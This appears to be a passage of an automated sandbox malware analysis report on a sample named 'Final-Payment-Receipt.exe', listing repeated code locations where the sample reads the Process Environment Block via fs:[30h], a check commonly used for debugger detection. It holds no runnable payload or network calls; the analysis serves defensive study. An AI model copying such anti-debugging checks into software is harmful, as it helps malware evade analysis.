          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014623E3 mov eax, dword ptr fs:[00000030h]1_2_014623E3
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DEB9A mov eax, dword ptr fs:[00000030h]1_2_013DEB9A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DEB9A mov eax, dword ptr fs:[00000030h]1_2_013DEB9A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2397 mov eax, dword ptr fs:[00000030h]1_2_013E2397
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EB390 mov eax, dword ptr fs:[00000030h]1_2_013EB390
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C1B8F mov eax, dword ptr fs:[00000030h]1_2_013C1B8F
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C1B8F mov eax, dword ptr fs:[00000030h]1_2_013C1B8F
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E138B mov eax, dword ptr fs:[00000030h]1_2_013E138B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E138B mov eax, dword ptr fs:[00000030h]1_2_013E138B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E138B mov eax, dword ptr fs:[00000030h]1_2_013E138B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0146D380 mov ecx, dword ptr fs:[00000030h]1_2_0146D380
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147138A mov eax, dword ptr fs:[00000030h]1_2_0147138A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DDBE9 mov eax, dword ptr fs:[00000030h]1_2_013DDBE9
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]1_2_013E03E2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]1_2_013E03E2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]1_2_013E03E2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]1_2_013E03E2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]1_2_013E03E2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]1_2_013E03E2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01485BA5 mov eax, dword ptr fs:[00000030h]1_2_01485BA5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E53C5 mov eax, dword ptr fs:[00000030h]1_2_013E53C5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]1_2_013DB236
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]1_2_013DB236
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]1_2_013DB236
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]1_2_013DB236
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]1_2_013DB236
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]1_2_013DB236
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147EA55 mov eax, dword ptr fs:[00000030h]1_2_0147EA55
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01444257 mov eax, dword ptr fs:[00000030h]1_2_01444257
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F4A2C mov eax, dword ptr fs:[00000030h]1_2_013F4A2C
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F4A2C mov eax, dword ptr fs:[00000030h]1_2_013F4A2C
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]1_2_013DA229
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D3A1C mov eax, dword ptr fs:[00000030h]1_2_013D3A1C
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0146B260 mov eax, dword ptr fs:[00000030h]1_2_0146B260
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0146B260 mov eax, dword ptr fs:[00000030h]1_2_0146B260
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488A62 mov eax, dword ptr fs:[00000030h]1_2_01488A62
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B5210 mov eax, dword ptr fs:[00000030h]1_2_013B5210
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B5210 mov ecx, dword ptr fs:[00000030h]1_2_013B5210
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B5210 mov eax, dword ptr fs:[00000030h]1_2_013B5210
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B5210 mov eax, dword ptr fs:[00000030h]1_2_013B5210
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h]1_2_013BAA16
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h]1_2_013BAA16
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C8A0A mov eax, dword ptr fs:[00000030h]1_2_013C8A0A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F927A mov eax, dword ptr fs:[00000030h]1_2_013F927A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147AA16 mov eax, dword ptr fs:[00000030h]1_2_0147AA16
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147AA16 mov eax, dword ptr fs:[00000030h]1_2_0147AA16
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F5A69 mov eax, dword ptr fs:[00000030h]1_2_013F5A69
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F5A69 mov eax, dword ptr fs:[00000030h]1_2_013F5A69
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F5A69 mov eax, dword ptr fs:[00000030h]1_2_013F5A69
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471229 mov eax, dword ptr fs:[00000030h]1_2_01471229
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9240 mov eax, dword ptr fs:[00000030h]1_2_013B9240
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9240 mov eax, dword ptr fs:[00000030h]1_2_013B9240
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9240 mov eax, dword ptr fs:[00000030h]1_2_013B9240
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9240 mov eax, dword ptr fs:[00000030h]1_2_013B9240
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CAAB0 mov eax, dword ptr fs:[00000030h]1_2_013CAAB0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CAAB0 mov eax, dword ptr fs:[00000030h]1_2_013CAAB0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EFAB0 mov eax, dword ptr fs:[00000030h]1_2_013EFAB0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]1_2_013B52A5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]1_2_013B52A5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]1_2_013B52A5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]1_2_013B52A5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B52A5 mov eax, dword ptr fs:[00000030h]1_2_013B52A5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013ED294 mov eax, dword ptr fs:[00000030h]1_2_013ED294
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013ED294 mov eax, dword ptr fs:[00000030h]1_2_013ED294
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2AE4 mov eax, dword ptr fs:[00000030h]1_2_013E2AE4
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2ACB mov eax, dword ptr fs:[00000030h]1_2_013E2ACB
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01433540 mov eax, dword ptr fs:[00000030h]1_2_01433540
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4D3B mov eax, dword ptr fs:[00000030h]1_2_013E4D3B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4D3B mov eax, dword ptr fs:[00000030h]1_2_013E4D3B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4D3B mov eax, dword ptr fs:[00000030h]1_2_013E4D3B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01463D40 mov eax, dword ptr fs:[00000030h]1_2_01463D40
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BAD30 mov eax, dword ptr fs:[00000030h]1_2_013BAD30
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF527 mov eax, dword ptr fs:[00000030h]1_2_013EF527
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF527 mov eax, dword ptr fs:[00000030h]1_2_013EF527
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF527 mov eax, dword ptr fs:[00000030h]1_2_013EF527
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DC577 mov eax, dword ptr fs:[00000030h]1_2_013DC577
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DC577 mov eax, dword ptr fs:[00000030h]1_2_013DC577
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]1_2_013D8D76
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]1_2_013D8D76
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]1_2_013D8D76
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]1_2_013D8D76
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]1_2_013D8D76
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D7D50 mov eax, dword ptr fs:[00000030h]1_2_013D7D50
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0143A537 mov eax, dword ptr fs:[00000030h]1_2_0143A537
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488D34 mov eax, dword ptr fs:[00000030h]1_2_01488D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F3D43 mov eax, dword ptr fs:[00000030h]1_2_013F3D43
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147E539 mov eax, dword ptr fs:[00000030h]1_2_0147E539
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov ecx, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E1DB5 mov eax, dword ptr fs:[00000030h]1_2_013E1DB5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E1DB5 mov eax, dword ptr fs:[00000030h]1_2_013E1DB5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E1DB5 mov eax, dword ptr fs:[00000030h]1_2_013E1DB5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E35A1 mov eax, dword ptr fs:[00000030h]1_2_013E35A1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EFD9B mov eax, dword ptr fs:[00000030h]1_2_013EFD9B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EFD9B mov eax, dword ptr fs:[00000030h]1_2_013EFD9B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]1_2_0147FDE2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]1_2_0147FDE2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]1_2_0147FDE2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]1_2_0147FDE2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]1_2_013B2D8A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]1_2_013B2D8A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]1_2_013B2D8A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]1_2_013B2D8A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]1_2_013B2D8A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01468DF1 mov eax, dword ptr fs:[00000030h]1_2_01468DF1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]1_2_013E2581
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]1_2_013E2581
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]1_2_013E2581
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2581 mov eax, dword ptr fs:[00000030h]1_2_013E2581
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472D82 mov eax, dword ptr fs:[00000030h]1_2_01472D82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CD5E0 mov eax, dword ptr fs:[00000030h]1_2_013CD5E0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CD5E0 mov eax, dword ptr fs:[00000030h]1_2_013CD5E0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014805AC mov eax, dword ptr fs:[00000030h]1_2_014805AC
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014805AC mov eax, dword ptr fs:[00000030h]1_2_014805AC
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3C3E mov eax, dword ptr fs:[00000030h]1_2_013E3C3E
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3C3E mov eax, dword ptr fs:[00000030h]1_2_013E3C3E
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3C3E mov eax, dword ptr fs:[00000030h]1_2_013E3C3E
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EBC2C mov eax, dword ptr fs:[00000030h]1_2_013EBC2C
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144C450 mov eax, dword ptr fs:[00000030h]1_2_0144C450
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144C450 mov eax, dword ptr fs:[00000030h]1_2_0144C450
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01471C06 mov eax, dword ptr fs:[00000030h]1_2_01471C06
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148740D mov eax, dword ptr fs:[00000030h]1_2_0148740D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148740D mov eax, dword ptr fs:[00000030h]1_2_0148740D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0148740D mov eax, dword ptr fs:[00000030h]1_2_0148740D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EAC7B mov eax, dword ptr fs:[00000030h]1_2_013EAC7B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]1_2_01436C0A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]1_2_01436C0A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]1_2_01436C0A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436C0A mov eax, dword ptr fs:[00000030h]1_2_01436C0A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB477 mov eax, dword ptr fs:[00000030h]1_2_013DB477
